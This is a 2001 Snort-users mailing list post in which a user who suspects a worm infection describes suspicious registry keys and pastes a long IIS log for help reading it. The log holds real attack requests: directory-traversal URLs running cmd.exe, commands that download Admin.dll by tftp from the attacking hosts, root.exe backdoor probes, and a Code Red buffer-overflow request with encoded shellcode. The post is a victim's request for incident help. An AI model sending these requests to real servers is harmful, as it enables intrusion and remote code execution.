[Snort-users] Infected? Help Me Find Out!

Jason Withrow jwithrow at ...422...
Tue Sep 18 17:59:01 EDT 2001


I had the admin.dll, but no root.exe or cmd.exe where it didn't belong.

No hacked up explorer.exe's, I did have a ton of new regKeys, with 2
keys each

DLLPatch-x  REG_SZ
X           REG_BINARY

And a new key called badApp as well.

Anyone know the complete removal process? I think I got it all, but who
knows.

Also, can someone look at my log here and make some sense out of it, it
looks like all requests didn't complete, but I can't really read these
things.

I started with the first request for C+dir, there are all sorts of
different codes returned 404, 200, 503? I know 404 is not found what
about the rest?

Thanks,

I attached the log as well to preserve text formatting as email has a
way of wrapping unreadably.

- Jason 

------- IIS LOG ------------------
2001-09-18 13:34:17 66.31.147.158 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:34:17 66.31.147.158 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:34:19 66.31.147.158 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:34:19 66.31.147.158 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:34:20 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:34:45 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:35:27 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:35:53 66.31.70.112 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:35:53 66.31.70.112 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:36:21 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:36:22 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:36:22 66.31.147.158 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:36:22 66.31.147.158 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:36:32 66.31.147.158 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:36:32 66.31.147.158 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:36:34 66.31.147.158 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 -
2001-09-18 13:36:34 66.31.147.158 - 66.31.82.9 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:36:35 66.31.147.158 - 66.31.82.9 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:36:35 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:36:35 66.31.147.158 - 66.31.82.9 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:36:37 66.31.147.158 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:36:37 66.31.147.158 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:36:48 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:36:48 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:36:58 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:37:09 66.31.222.89 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:37:14 66.31.222.89 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:37:15 66.31.222.89 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:37:17 66.31.222.89 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:37:45 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:37:45 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:37:46 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:37:50 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:37:50 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:37:50 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:37:51 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:37:51 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:37:53 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:38:03 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:38:03 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:38:07 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:38:07 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:38:09 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:38:09 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:38:11 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:38:11 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%2f../Admin.dll - 500 -
2001-09-18 13:39:45 149.225.83.203 - 66.31.82.9 80 GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb
d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00
=a 302 -
2001-09-18 13:41:41 66.31.135.215 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:41:41 66.31.135.215 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:41:41 66.31.135.215 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:41:41 66.31.135.215 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:41:41 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:41:41 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:41:42 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:05 66.31.95.161 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:43:07 66.31.95.161 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:43:08 66.31.95.161 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:10 66.31.95.161 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:11 66.31.95.161 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:11 66.31.135.215 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:11 66.31.135.215 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:13 66.31.135.215 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:13 66.31.135.215 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:43:13 66.31.135.215 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 -
2001-09-18 13:43:13 66.31.95.161 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.95.161%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:13 66.31.135.215 - 66.31.82.9 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:13 66.31.135.215 - 66.31.82.9 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:43:13 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:43:14 66.31.135.215 - 66.31.82.9 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:14 66.31.135.215 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:14 66.31.135.215 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:15 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:15 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:15 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:18 66.31.95.161 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.95.161%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:42 66.31.114.15 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:43:42 66.31.114.15 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:43:42 66.31.114.15 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:42 66.31.114.15 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:42 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:42 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:42 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:44:00 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:44:00 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:44:00 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%2f../Admin.dll - 500 -
2001-09-18 13:44:45 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:44:45 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:44:45 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:44:56 66.31.47.252 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:44:58 66.31.47.252 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:45:08 66.31.47.252 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:45:13 66.31.94.77 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:45:13 66.31.94.77 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:45:13 66.31.94.77 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:45:13 66.31.94.77 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:45:13 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:45:13 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:45:13 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:45:29 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:45:29 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:45:29 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:45:29 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:45:34 66.31.94.77 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:45:34 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:45:34 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:45:34 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:45:38 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:45:38 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:45:38 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:45:38 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:45:38 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:45:55 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:45:56 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:46:00 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:46:00 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:46:01 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:46:01 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:46:01 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:46:01 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:46:01 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:46:01 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:46:11 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:46:11 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:46:16 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:46:16 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:46:16 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:46:21 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%2f../Admin.dll - 500 -
2001-09-18 13:47:09 66.31.25.7 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:47:13 66.31.25.7 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:47:13 66.31.25.7 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:47:13 66.31.25.7 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:47:17 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:47:17 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:47:17 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:47:18 66.31.25.7 - 66.31.82.9 80 GET
